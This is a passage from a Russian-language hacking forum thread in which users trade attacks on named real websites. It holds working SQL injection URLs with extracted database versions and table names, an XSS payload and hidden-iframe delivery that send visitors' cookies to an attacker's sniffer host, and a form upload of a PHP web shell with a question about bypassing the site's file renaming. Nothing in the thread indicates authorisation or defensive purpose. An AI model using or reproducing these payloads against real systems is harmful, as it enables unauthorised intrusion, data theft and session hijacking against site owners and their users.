Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Зачем там мучатся с MQ, если в админке булки можно сразу сохранить другой код, чтоб всего этого не было. А с GET-ом ясно, я не это имел ввиду.


    P.S. Я с UK. Сорри фор май Рашн :D
     
  2. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
    можно ли обойти вот такую вот фигнюшку??
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    проверяются вхождения в строке, врятли обойдешь
     
    _________________________
  4. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Не слушай никого, все выводится

    5.0.51a-24+lenny5:a28161_studyguid:a14801@localhost:debian-linux-gnu
     
  5. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    http://www.studyguide.ru/library.php
    ?search=2
    &form[name]=-1'+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4,5--+
    &form[word]=

    Интересно бы саму скуль увидеть или метод.
     
    #19225 Melfis, 2 Feb 2012
    Last edited: 2 Feb 2012
    2 people like this.
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    Подскажите как можно дальше вывесли какие либо данные
     
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Error-based:
    Code:
    http://www.indexcopernicus.com/info.php?id=6)+and(select+1+from(select+count(*),concat((select+concat(table_name,0x00)+from+information_schema.tables+limit+20,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    Result:
    Code:
    Duplicate entry 'users' for key 1
     
    1 person likes this.
  8. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    подскажите альтернативу Charles
     
  9. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    tamper data
     
  10. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    не не тампер не пропрёт а уже всё тенкс.
     
    #19230 boortyhuhtyu, 3 Feb 2012
    Last edited: 3 Feb 2012
  11. Serrg

    Serrg Elder - Старейшина

    Joined:
    25 Dec 2011
    Messages:
    85
    Likes Received:
    15
    Reputations:
    13
    Здараствуйте, подскажите пожалуйста.. Нашел
    http://vsetke.ru/registration/registration_form.jsp
    xss При вставке в поля имя и пароль
    "><script>alert(/xss/)</script>
    Подскажи как можно вытащить куки ?
     
  12. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    Количество столбцов 1, но почему ошибку все равно выдает ?
     
  13. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    попробуй вывод в ошибке, там походу нет вывода столбцов вот так крути
    http://www.poezia.ru/article.php?sid=65755+and(select+count(*)+from+information_schema.tables+group+by(concat(version(),0x00,floor(rand(0)*2))))--+
     
    1 person likes this.
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Code:
    http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+count(*),concat((select+version()),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    Code:
    Duplicate entry '[B]5.0.27[/B]' for key 1
    Code:
    http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+count(*),concat((select+concat(table_name,0x3a,column_name,0x00)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    Code:
    Duplicate entry 'CHARACTER_SETS:CHARACTER_SET_NAME' for key 1
     
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Code:
    <script>img = new Image(); img.src = "http://sniffer?"+document.cookie;</script>
    <script>location.href = "http://sniffer?" + document.cookie;</script>
    
     
  16. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,308
    Reputations:
    1,557
    PHP:
    "><script>(new Image()).src='http://site.com/sniffer.php?'+document.cookie</script>
    Можно отправлять GET-запросом
    Вставляешь на свой сайт скрытый фрейм
    PHP:
    <iframe style="width:0px;height:0px;visibility:hidden" src="http://vsetke.ru/registration/registration_form.jsp?email_address=&#34><script>(new Image()).src='http://site.com/sniffer.php?'&#43document.cookie</script>"></iframe>
    Когда юзер зайдет на сайт, куки отправятся на сниффер. В IE и хроме этот вариант не сработает из-за фильтров.

    p.s.:
    В этом примере используется GET-запрос, потому что реализация атаки проще. Но если есть возможность, лучше использовать POST-запрос для эксплуатации XSS.
     
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,308
    Reputations:
    1,557
    Потому что несколько запросов к базе. В первом один столбец, во втором больше.
     
    1 person likes this.
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    что можно сделать в подобном случае?
    ответ
    error setting cookie
     
  19. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    Code:
    POSTDATA =-----------------------------114782935826962
    Content-Disposition: form-data; name="f[id]"
    
    -----------------------------114782935826962
    Content-Disposition: form-data; name="f[galery_id]"
    
    1565
    -----------------------------114782935826962
    Content-Disposition: form-data; name="f[order_id]"
    
    -----------------------------114782935826962
    Content-Disposition: form-data; name="f[title_ru]"
    
    -----------------------------114782935826962
    Content-Disposition: form-data; name="f[title_en]"
    
    
    -----------------------------114782935826962
    Content-Disposition: form-data; name="f[title_ua]"
    
    -----------------------------114782935826962
    Content-Disposition: form-data; name="f[img_small]"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------114782935826962
    Content-Disposition: form-data; name="f[img_big]"; filename="d00m.php"
    Content-Type: unknown/unknown
    
    <?php #v2.3	//Version
    подскажите в перехвате даных как изменить конечное имя на например 1.php, потому что меняется на 89.img
     
  20. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)
    вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.